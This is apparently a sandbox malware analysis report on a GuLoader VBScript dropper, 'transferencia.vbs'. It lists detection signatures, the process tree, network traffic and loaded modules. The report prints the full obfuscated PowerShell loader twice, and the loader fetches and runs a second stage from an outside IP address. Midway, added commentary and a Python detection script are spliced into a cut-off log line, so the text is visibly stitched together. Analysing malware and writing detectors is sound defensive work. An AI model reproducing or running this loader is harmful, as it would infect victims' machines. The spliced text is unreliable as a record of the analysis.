
Windows Analysis Report
transferencia.vbs

Overview

General Information

Sample name: transferencia.vbs
Analysis ID: 1524803
MD5: c68010fc942eef8e8868e5d3197aadc8
SHA1: 964fa94fcbce9a5a0499672e881b271530c7e1fa
SHA256: 08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4
Tags: GuLoader, vbs, user-abuse_ch

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 1248 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. 
ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,s Marn chieD gtrF.shtGeraiAnatoO.twnFr k2Komp5se i4 M l ');$Appartementerne=Opbrugets52 'Fdev$IndhG StorBedruUnliiFl,rn andeEpip.PaalDBengoSeiswPiannG unlskruoTo oaGlu,dlittF rii dsslRecaeStri(Mas $Inf USnevg dlneswamnpromu erdmUnstm S,jeNederdiss,Smir$EsteH andeJohaaTestdUnr wTravaPy al Va,lanaps ko ) O i ';$Headwalls=$Indkopiering;ggepuncherne (Opbrugets52 'kate$Dag,G araLEkseOGr.nBglacAF.rbLarbi:D nsSUndeANohoNMeteEsa.trBasiiBiffNRandGStums .hapCou L AceAAandnSkriSLike=Nons(OverT Pr eBesvs emotDd a-Fa.sper oaPrecTUn eh,ota Supp$Ud kh PloEEtheA Unidtragw unkAGypplGenfLNav sDann)Fecu ');while (!$Saneringsplans) {ggepuncherne (Opbrugets52 'Sati$ProcgMothlTyveo Preb ,usaHnislOdou:A orSR alopri,rEvo.t DehbEndorInt s Usmgsp cr CoroDisms S esPac.e ndrAngeeMetrrReineP,einhira=Snif$My lt JonrSammuE tue No, ') ;ggepuncherne $Appartementerne;ggepuncherne (Opbrugets52 'CuncSFrdstUdvialovbr.avtt S.i-BekoSPolylNonie 
UdleNapopArve Ribi4Kemi ');ggepuncherne (Opbrugets52 'a ro$MispgModslPlano dseb rka Bufl li: .ntSchina SagnSnapeGelar FreiSlgenKassgSides Filp verlTranaDok,n Slas Gla= S,a( FaaT.itueT ess olet lop-PantPb siaTorstPrush F k Pede$D,ffHSacce DisaAnild S,iwSl,vaAntilInfelPainsIm.r)Unlo ') ;ggepuncherne (Opbrugets52 ' Oc $MoelgdknilmarroUnpob BaraIn,llHark:StadIcymonRverd AntbBenvyshe.gBry nDowniSy,snKri,g v nsUnsakC ula,nclsTracs DupeRail=Form$ kilg Jorl epoo GenbTan aTromlPent:BeklORebsp laybFlledTaale ProsS at+Prsi+ Rus%Psyc$G afS Ko aJibblC.emaSvanmForna inn TriduncarAarvi Be nF lle La . recBonhoTel uK ntn.inet Con ') ;$Ugenummer=$Salamandrine[$Indbygningskasse];}$Vertikalernes=278564;$Binokular=29796;ggepuncherne (Opbrugets52 'Tung$Lkkeg SimlK tkoEnt b AdhaDis lRoni:VemoA.appbEnkesDybvt acrSan,uGasosOpkaiAntioUvrdnSkot T.l= at SkilG trae TrotRigs-OverCSp aoStadnWorktS.mmeOf in A tt Or. Ubev$ AfsHOcl.e s aaGhendEs awe spaRec lPer lKrtesA.at ');ggepuncherne (Opbrugets52 'Ind $AlkygTr clHopio DesbAlfaaM milXene:SexaPKrlir sl,oloantC leo KnarItattStonhTop,oMgl pToa.tLatee.yperd siaDisl Par = ebu Evan[Rer,S locyDeodsP rytUn ee Do.m ume.subiCInveo YaknRensvPendedeborAf mtPara]Rest:P,ak: WhiFUnrerOtheoBa,omToneBDes aJun sA emeDe,e6u pr4 retSSkoltBrisrKrokiChapnNe tgLan (Klft$ ,piATaulbStoks R.mt s vrTryku EqusPas iAktioHyponUfat) K a ');ggepuncherne (Opbrugets52 'Mine$ungrgArbelWelso Makb Ro apibelCont: ucuJFyrseUng.sKoras Pr.iJudicRin,aMiso Sag.=G ff Swoo[snotSSl.syGenks NontPreleCon,m Sp,. homTUltreSydhxDelrtTall.RadiE Astn nducUretoStdtdu jliSamdnSalggArge] Ra :Amus:FornAConuSSoulCGlggIAfhaITiss.TanyGNonreTj etUnc SEnketG eerKvkkiSermnsupegKami( Iow$MiliPpreir CafoUn htI dso DrirKapitCodhhSammoundepAdsttGryne VrarIsola Tea)S,ri ');ggepuncherne (Opbrugets52 'Fors$Fi agK lkl H.loPlebb UnsaOmr lMo.e:MameU ParnSletitalanBelljExtruRe srInt,iUdtao D.nuUnfes Bol=Torm$AsymJZeu eFinlsUkams Z.ai Sevc SupaMame. 
GstsVse.uPeppbtkkesZephtAmenrArali DsrnMet g Per(Mark$Ma.aVA oueD,asr ertVandi SeakArbeaUsdel F re T,krLegansc teV risTil ,Fr,e$g.ntBMajoi Fonn WoooParakDannuChlolReina,lasrGrs )Geot ');ggepuncherne $Uninjurious;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 2448, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: amsi64_2448.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security

      System Summary

      Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", ProcessId: 1248, ProcessName: wscript.exe
      Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs", ProcessId: 1248, ProcessName: wscript.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the obfuscated script recorded in the process tree above
      No Suricata rule has matched

      AV Detection

      Source: transferencia.vbs, Virustotal: Detection: 14%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.6% probability
      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic, HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1 Host: 91.109.20.161 Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 91.109.20.161 Connection: Keep-Alive
      Source: unknown, TCP traffic detected without corresponding DNS query: 91.109.20.161
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.109.20.161
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.109.20.161(
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://91.109.20.161/Hestebremsen.chmP
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the obfuscated script recorded in the process tree above
      Source: transferencia.vbs, Initial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 6062
      Source: classification engine, Classification label: mal88.expl.evad.winVBS@4/3@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Dorgens.Uns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1
      Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
      Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: transferencia.vbs, Virustotal: Detection: 14%
      Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the obfuscated script recorded in the process tree above
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . 
rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=Jump to behavior
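The process tree above is the whole detection story: wscript.exe is started on a .vbs file and then spawns powershell.exe with a multi-kilobyte command line that is padded with `<# ... #>` comment blocks. The Python below is an added example for this page, not part of the Joe Sandbox report and not the text of the Sigma rules it names; it mirrors what those rule titles describe ("WScript or CScript Dropper", "Wscript starts Powershell", "Very long command line found") as a pass over process-creation records and then correlates parent and child, because each indicator alone is noisy and the chain is the signal. The event records are constructed to look like Sysmon Event ID 1 fields: the first two follow the PIDs and images in this report (the PowerShell command line keeps the real opening and stands in a filler literal for the kilobytes of obfuscated strings that follow), the other two are benign stand-ins. The 4096-character threshold and the "two or more comment blocks" heuristic are assumptions to tune per environment.

```python
"""Detection pass for the execution chain in this report: wscript.exe started on
a .vbs file, then spawning powershell.exe with a very long, comment-padded
command line.

Added example for this page; not part of the Joe Sandbox report and not the
text of the Sigma rules the report names. SAMPLE_EVENTS is constructed, shaped
like Sysmon Event ID 1 records; thresholds are assumptions.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
LONG_CMDLINE_CHARS = 4096                      # assumption: tune to the baseline
COMMENT_BLOCK = re.compile(r"<#.*?#>", re.S)   # PowerShell block comments
TOKEN = re.compile(r'"([^"]*)"|(\S+)')         # quoted spans or bare words

# Opening of the real command line from the report; the filler literal stands in
# for the kilobytes of obfuscated strings that follow it in the sample.
GULOADER_PS_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;'
    r"$Gyrectomies='Bogman';"
    r"<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;"
    r"$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}"
    + "$Filler='" + "x" * 4200 + "'\""
)

SAMPLE_EVENTS = [  # constructed; PIDs 1248 and 2448 follow the report
    {"ProcessId": 1248, "ProcessGuid": "p1", "ParentProcessGuid": "p0",
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"'},
    {"ProcessId": 2448, "ProcessGuid": "p2", "ParentProcessGuid": "p1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": GULOADER_PS_CMDLINE},
    {"ProcessId": 5000, "ProcessGuid": "p3", "ParentProcessGuid": "p0",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": 5001, "ProcessGuid": "p4", "ParentProcessGuid": "p5",
     "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return PureWindowsPath(path).name.lower()


def script_file_args(command_line: str) -> list[str]:
    """Arguments of a command line that name a script file by extension."""
    tokens = [quoted or bare for quoted, bare in TOKEN.findall(command_line)]
    return [t for t in tokens[1:]
            if PureWindowsPath(t).suffix.lower() in SCRIPT_EXTENSIONS]


def classify(event: dict) -> set[str]:
    """Per-event indicators. Each is noisy on its own; see chain_alerts()."""
    hits = set()
    parent, child = image_name(event["ParentImage"]), image_name(event["Image"])
    cmd = event["CommandLine"]
    if child in SCRIPT_HOSTS and script_file_args(cmd):
        hits.add("wsh_runs_script_file")
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        hits.add("wsh_spawns_powershell")
    if len(cmd) >= LONG_CMDLINE_CHARS:
        hits.add("very_long_command_line")
    if child == "powershell.exe" and len(COMMENT_BLOCK.findall(cmd)) >= 2:
        hits.add("comment_padded_powershell")
    return hits


def chain_alerts(events: list[dict]) -> list[dict]:
    """Correlate parent and child: a WSH process that ran a script file and then
    spawned powershell.exe with a long or comment-padded command line."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        hits = classify(e)
        parent = by_guid.get(e["ParentProcessGuid"])
        if ("wsh_spawns_powershell" in hits
                and hits & {"very_long_command_line", "comment_padded_powershell"}
                and parent is not None
                and "wsh_runs_script_file" in classify(parent)):
            alerts.append({"script": script_file_args(parent["CommandLine"])[0],
                           "parent_pid": parent["ProcessId"],
                           "child_pid": e["ProcessId"],
                           "indicators": sorted(hits)})
    return alerts


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["ProcessId"], sorted(classify(event)))
    print(chain_alerts(SAMPLE_EVENTS))
```

Run on the constructed events, only the wscript.exe (1248) to powershell.exe (2448) pair raises an alert; the slmgr.vbs run under cscript.exe trips the script-file indicator alone and is not alerted, which is the point of correlating rather than alerting on any WSH launch.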
      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
